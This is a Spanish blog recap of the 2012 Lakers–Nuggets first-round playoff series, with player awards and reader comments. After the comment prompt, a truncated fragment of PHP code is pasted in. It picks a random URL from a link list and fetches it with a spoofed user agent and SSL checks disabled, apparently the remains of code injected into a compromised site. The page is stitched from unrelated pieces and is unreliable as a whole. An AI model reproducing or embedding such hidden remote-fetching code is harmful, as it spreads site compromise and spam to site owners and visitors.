Resumen Lakers 4 – Nuggets 3

14 de May de 2012 por MagicJohnson32

pauscreamLakers y Nuggets han protagonizado una de las series más jugosas de la primera ronda de los Playoffs. Después de un inicio de eliminatoria que hizo pensar en un posible paseo angelino debido al dominio ejercido por Bynum en el partido inaugural, los Lakers necesitaron finalmente los siete partidos y llegaron a verse 4 puntos por debajo en el último cuarto del encuentro decisivo. Lo que se vivió entre el game 1 y el 7 fue una montaña rusa táctica y emocional, con Lawson y Kobe convertidos en únicas constantes en las ecuaciones de sus respectivos equipos. Mientras los angelinos arrancaron con las ideas claras, ralentizando el juego y dominando las zonas, George Karl supo hacer mejores ajustes para reconducir el juego a un territorio favorable para su equipo. Faried y McGee neutralizaron, al menos parcialmente, el impacto de Bynum y Gasol, con lo cual el juego se abrió y Lawson, tras un primer partido terrible, pudo explotar la veta del contraataque y la finalización en transiciones.

El triple doble de Bynum fue la historia del partido inaugural, más allá de los 31 puntos de Kobe y el 13-8-8 de Gasol. El pívot causó el pánico en la zona y condicionó por sí solo todo el ataque de los Nuggets. Tras su fenomenal exhibición, el rendimiento defensivo de Bynum fue decayendo y los Lakers se resintieron. Ganaron el segundo de la mano de Bryant y con 27 puntos de Bynum, pero Denver fue superior durante algunas fases del partido, siempre con Lawson al frente, y pese a que la eliminatoria viajó a Denver con un 2-0, la sensación era que Karl estaba cerca de encontrar la receta. Un ingrediente fundamental resultó Andre Miller, quien del tercer al sexto partido masacró a Steve Blake en el poste bajo aprovechando su superioridad física y la pasividad de Bynum y Gasol en las ayudas defensivas.

Aun así, los Lakers robaron un partido en Denver, el cuarto, el de la mejor actuación de Gallinari. Pero dos triples en el último minuto de Sessions y Blake situaron el 3-1 y dieron al cuadro californiano la oportunidad de cerrar la eliminatoria en casa en el quinto encuentro y minimizar así el descanso de los Thunder, ganadores por 4-0 en su serie contra los Mavericks. Sin embargo, de todos es sabida la tendencia intrínseca de los Lakers para convertir cualquier trámite en un drama. Las declaraciones de Bynum antes del partido, asegurando que iba a resultar sencillo eliminar a los Nuggets, fueron un presagio de lo que ocurriría: Denver fue muy superior, McGee pasó por encima de Bynum, y los Nuggets alargaron la eliminatoria pese a que a punto estuvo Bryant de remontar por sí solo una desventaja de 15 puntos en los últimos cinco minutos de partido.

lawSe suponía que el 3-2 significaría un toque de atención para los jugadores de los Lakers, especialmente Bynum y Gasol, ambos muy discretos en la última derrota. Se esperaba que asumieran la responsabilidad, y más aún con la gastroenteritis que afectaba a Kobe. De lo que sucedió en aquel sexto encuentro ya se ha hablado lo suficiente y no hace falta volver a ello. Sencillamente, los Nuggets atropellaron a los Lakers desde el mismo salto inicial y llevaron la eliminatoria hasta el séptimo partido con un recital de Lawson y el peor partido que se le recuerda a Pau Gasol, en la línea de casi todos sus compañeros. La crisis que se desató en el entorno de los Lakers, con declaraciones y críticas feroces especialmente hacia Bynum y Gasol, iba a servir para medir la concentración y resistencia anímica de los jugadores en el séptimo partido.

El Game 7 siguió el guion de la eliminatoria: arrancaron algo mejor los Lakers, moviendo el balón y buscando a sus pívots, pero ajustó Karl para equilibrar hasta llegar a un final igualado. Por primera vez en todas las series, los Nuggets emplearon defensas dobles muy agresivas sobre Kobe Bryant, con lo que buena parte de las posibilidades de éxito de los Lakers quedaron en manos de la defensa, el tiro exterior y la labor de los interiores. Y ahí radicó la clave de la victoria angelina. Gasol y Bynum realizaron un esfuerzo extraordinario bajo los aros, Steve Blake logró un 5 de 6 en triples y Metta World Peace, de regreso tras su sanción, se erigió como factor fundamental para frenar a Andre Miller y Gallinari.

Por supuesto, la victoria de los Lakers no llegó sin antes haber desperdiciado una renta de 16 puntos en el tercer cuarto. Entre Ty Lawson y Al Harrington lograron 23 puntos en un parcial de 27-7 que puso a los Nuggets por delante a 10 minutos de la conclusión. Pero como más vale tarde que nunca, Mike Brown también hizo un ajuste que resultó crítico: situar a Kobe Bryant sobre Lawson. A partir de ese momento, el base no anotó, Gasol y Bynum sellaron la pintura (dos tapones cada uno en los últimos 5:30) y los Lakers se llevaron el partido y una eliminatoria magnífica para el espectador pero que deja a los angelinos en un estado físico muy precario para afrontar la segunda ronda ante los Thunder.

kobefloorPREMIOS

MVP: Más allá de sus promedios de casi 30 puntos, 5 asistencias y 5 rebotes, Kobe Bryant ha demostrado una vez más su capacidad innata para liderar bajo cualquier circunstancia, en la victoria y en la derrota, en la salud y en la enfermedad. Y cuando el agotamiento y las dobles defensas amenazaban con neutralizarlo en el tramo final del séptimo partido, Bryant supo adaptarse y reconvertirse en pasador y defensor.

Rookie: Ha sido uno de los mejores novatos de la temporada y, sin duda, el mejor de la primera ronda de Playoffs. Kenneth Faried ha supuesto una pesadilla para los Lakers, en especial para Pau Gasol, y ha logrado un promedio de 10 puntos, 10 rebotes y 1 tapón.

La sorpresa: A falta de Derek Fisher, los Lakers han encontrado en Steve Blake una versión más que digna de clutch player, al menos en esta eliminatoria. Su triple final en el cuarto partido puso el 3-1, y para el séptimo se reservó la que es, de largo, su mejor anotación de la temporada y desde que firmara por los Lakers: 19 puntos con 5 de 6 en triples (dos de ellos en el último cuarto).

La decepción: ¿Qué habría sido de Danilo Gallinari si Metta World Peace hubiese jugado la eliminatoria completa? El italiano hizo un partido desastroso coincidiendo con el regreso de MWP, justo cuando los Nuggets se jugaban la clasificación. Sus 3 puntos con 1 de 9 en tiros fueron una losa insalvable para los de George Karl.

El mayor esfuerzo en vano: En un equipo en el que a veces se echa en falta un líder, Ty Lawson ha ejercido como tal. 19 puntos (con más de 51% de acierto) y 6 asistencias ha promediado el pequeño base, que en muchos tramos se ha mostrado dominante y muy superior a sus pares.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. sempren dice:
    #1

    Para mí Gallo estuvo bastante mal en todos los partidos de la serie, solo iba salvando las estadísticas con algunas penetraciones más o menos forzadas en las que tiene la habilidad de sacar tiros libres. En el último partido no las hizo, y eso sí pudo ser mérito de Metta, por lo demás yo creo que fue el propio italiano quien no estaba nada bien (casi ni tiró de 3 ni estando solito en la línea).

    En el 7º a algunos Nuggets les pesó la presión (Faried perdió balones tontos y McGee no estuvo a gusto en ningún momento), y Blake estuvo… ¿como nunca? Y Kobe, vaya canasta…

      Citar

  2. Ru dice:
    #2

    Genial último partido y brillante eliminatoria con sus idas y venidas,pero en general ha sido tremendamente divertida.

    Los Lakers siguen en la brecha y aún está por escribir el análisis de su temporada pero por el lado de los Nuggets queda la sensación de que manteniendo el bloque hay un equipo muy divertido al que los resultados pueden acompañarles.Extendería la Qualifying sobre McGee y no sobre Rudy,sumando la baja de Andre Miller,así que habría que reforzar el PG.Sin embargo la gran duda viene por Gallinari y su capacidad de echarse el equipo a la espalda.Su bajón en porcentajes en postemporada preocupa y eso sin haber estado Artest en el lado amarillo salvo en el último partido.

      Citar

  3. Sancho88 dice:
    #3

    Con Faried-Magee, Gallinari se ve relegado a un segundo plano, con menos libertad para ser la primera referencia, menos confianza porque estáa mal, etc. Después de la lesión ha perdido mucha confianza en sí mismo y ha bajado mucho sus prestaciones, pero hasta el All-Star, verdaderamente estaba dando grandes lecciones de baloncesto. Es un gran alero y lo deben renovar, pienso yo. Necesita descansar en verano y a ver cómo vuelve, pero ni antes era tan bueno para ser jugador franquicia, ni ahora es un pegote malote que no vale para nada… Punto intermedio, es un jugador interesante de ver, porque defiende a gente pequeña con bastante soltura, bota muy bien el balón y puede penetrar con velocidad como un base-escolta, tiene buena mano, buen juego al poste… en mi opinión puede ser el alero total si se lo propone… Está atravesando por una mala racha pero nada más, el año que viene tiene que volver a su máximo nivel

      Citar

  4. Esteban dice:
    #4

    MagicJohnson32!!!!!! EL MEJOR RESUMEN DE SERIE DE LO QUE VA DE ESTA POST TEMPORADA

    el MVP de la primera fase, sigue asi que vas por el MVP de los PO !

      Citar

  5. GreenPride dice:
    #5

    Pues serie muy divertida gracias a la empanada transitoria de los Lakers. No hay equipo que se complique tanto la vida a ellos mismos como estos Lakers.
    En los 4 primeros partidos los Nuggets fueron claramente inferiores (excepto en el 3º), con los Lakers bajando el ritmo de los partidos y dominando por dentro. Aún así los Nuggets iban poco a poco encontrando la receta para hacer frente en la serie y esta era clara. Jugar a toda pastilla, ritmo infernal para los Lakers, agresividad de sus interiores y crear el máximo de problemas con sus bases en ataque a la ¿defensa? de Sessions y Blake. La empanada de los Lakers en el 5º les puso sobre la pista de cómo poder ganar la serie y a punto estuvieron de conseguirlo. En el 6º una extraordinaria actuación de todos frente a una nula defensa de los Lakers sirvió para machacarlos y en el 7º fueron capaces de remontar y ponerse arriba en el último cuarto. Y cuando habían remado hasta la orilla de la tierra prometida… llegaron Blake y MWP y les clavaron unos cuantos triples matadores. Sí, Bynum y Pau dominaron por dentro ese 7º y gracias a ello forzaron a la defensa de los Nuggets a cerrarse y ahí Blake y MWP fueron decisivos.
    Estoy de acuerdo en que Gallinari ha jugado una mala serie y también en que Lakers habría ganado más fácilmente si MWP hubiera jugado la serie completa. Al menos nos hemos divertido y esperemos que los Lakers hayan tomado nota para plantar cara a los Thunder.
    Por cierto, gran resumen el de Magic

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>